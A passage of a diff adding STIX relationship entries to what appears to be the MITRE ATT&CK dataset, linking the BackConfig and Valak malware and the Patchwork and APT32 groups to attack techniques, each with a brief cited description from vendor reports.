+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to remove files and folders related to previous infections.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--73d8feea-0b53-419a-be1b-5750aa47f2df",
+ "type": "relationship",
+ "modified": "2020-06-18T17:27:09.323Z",
+ "created": "2020-06-18T17:27:09.323Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c0417cdc-0451-41e3-8937-88e9ebd68d1a",
+ "type": "relationship",
+ "modified": "2020-06-29T15:59:07.632Z",
+ "created": "2020-06-18T17:27:09.352Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has used compressed and decimal encoded VBS scripts.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b82ea861-86df-4574-9727-f0d5828e9fe8",
+ "type": "relationship",
+ "modified": "2020-06-18T17:27:09.381Z",
+ "created": "2020-06-18T17:27:09.381Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has used VBS to install its downloader component and malicious documents with VBA macro code.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0614fc3b-614c-4d50-9ae2-ab526160faf5",
+ "type": "relationship",
+ "modified": "2020-06-24T20:29:46.211Z",
+ "created": "2020-06-18T17:27:09.385Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--66ce5052-08d8-4160-a8c9-f3e6b9e5cd1f",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.269Z",
+ "created": "2020-06-18T17:27:09.388Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+ "target_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8b2625de-8de9-4216-8805-d1e75093b098",
+ "type": "relationship",
+ "modified": "2020-06-18T17:29:43.758Z",
+ "created": "2020-06-18T17:29:43.758Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has signed malware with self signed certificates from fictitious and spoofed legitimate software companies.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1576ad32-c7cc-45af-b39e-410d96a6f908",
+ "type": "relationship",
+ "modified": "2020-06-18T17:45:26.363Z",
+ "created": "2020-06-18T17:45:26.363Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to base64 encode and XOR encrypt strings.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--25b8b66a-a9d0-4400-8b41-dd12208a25de",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.295Z",
+ "created": "2020-06-19T19:08:40.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8ae91ec7-32ed-46a2-9bc2-1c7b856c3cc7",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.205Z",
+ "created": "2020-06-19T19:08:40.368Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to take screenshots on a compromised host.(Citation: Cybereason Valak May 2020)\t ",
+ "relationship_type": "uses",
+ "id": "relationship--5797b454-e7cc-45a3-9bf1-7708d7286531",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.372Z",
+ "created": "2020-06-19T19:08:40.372Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--4143e83e-40a1-4d10-babf-9affba3cb101",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.375Z",
+ "created": "2020-06-19T19:08:40.375Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) can determine the Windows version on a compromised host.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7b4e1a93-99ca-444d-bfc4-bc589a9a25a9",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.378Z",
+ "created": "2020-06-19T19:08:40.378Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has used PowerShell to download additional modules.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e2c05732-0721-4836-aa07-52f4c379b361",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.373Z",
+ "created": "2020-06-19T19:08:40.373Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate domain admin accounts.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d4faeb90-07ee-4ae2-b77d-e002418d1b22",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.341Z",
+ "created": "2020-06-19T19:08:40.383Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to decode and decrypt downloaded files.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b99e218f-942b-4643-b4de-35649d2a4cbd",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.385Z",
+ "created": "2020-06-19T19:08:40.385Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to identify the MAC and IP addresses of an infected machine.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--93169fdc-7afd-41b9-90bc-54d99c1c86e6",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.387Z",
+ "created": "2020-06-19T19:08:40.387Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1fdd4a0b-fe6d-4fb1-a6ab-7f5063b6ecc3",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.357Z",
+ "created": "2020-06-19T19:08:40.392Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has used regsvr32.exe to launch malicious DLLs.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2bdaa624-15bb-4a69-8192-adc9fa44af3f",
+ "type": "relationship",
+ "modified": "2020-06-22T23:51:06.788Z",
+ "created": "2020-06-19T19:08:40.394Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate running processes on a compromised host.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1ca28941-562d-45e4-946c-518a2015c0dd",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.390Z",
+ "created": "2020-06-19T19:08:40.390Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) can determine if a compromised host has security products installed.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--49c5bbcf-7ac3-406f-8b58-2b4c00b2c41e",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.398Z",
+ "created": "2020-06-19T19:08:40.398Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate local admin accounts.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d670ddce-d32a-4165-a56e-5bb183f4c904",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.354Z",
+ "created": "2020-06-19T19:08:40.400Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) can gather information regarding the user.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5c46f9a0-fb83-473d-af9a-c1c98cfdd85b",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.409Z",
+ "created": "2020-06-19T19:08:40.409Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has been executed via Microsoft Word documents containing malicious macros.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--51656ee5-4d21-42c9-9719-826645b3508f",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.407Z",
+ "created": "2020-06-19T19:08:40.407Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to modify the Registry key HKCU\\Software\\ApplicationContainer\\Appsw64 to store information regarding the C2 server and downloads.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0841cd91-1151-411f-befc-0204e3a3eb30",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.402Z",
+ "created": "2020-06-19T19:08:40.402Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b91de2c3-897a-4e04-94f8-9e905564b47a",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.413Z",
+ "created": "2020-06-19T19:08:40.413Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has downloaded a variety of modules and payloads to the compromised host, including IcedID and [Ursnif](https://attack.mitre.org/software/S0386).(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3bae8349-dec3-4780-89aa-7ebbf1c2d44b",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.352Z",
+ "created": "2020-06-19T19:08:40.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has deployed tools after moving laterally using administrative accounts.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--1ecf4ac9-faad-4d2d-9a01-2618a7a54806",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.131Z",
+ "created": "2020-06-19T20:04:12.131Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) used the net view command to show all shares available, including the administrative shares such as C$ and ADMIN$.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--3c3f5cdb-f2cd-4bab-8196-26f160b38a5e",
+ "type": "relationship",
+ "modified": "2020-06-29T16:54:26.406Z",
+ "created": "2020-06-19T20:04:12.134Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--749fb1ed-d73c-4317-8c0f-6c059cff094f",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.136Z",
+ "created": "2020-06-19T20:04:12.136Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
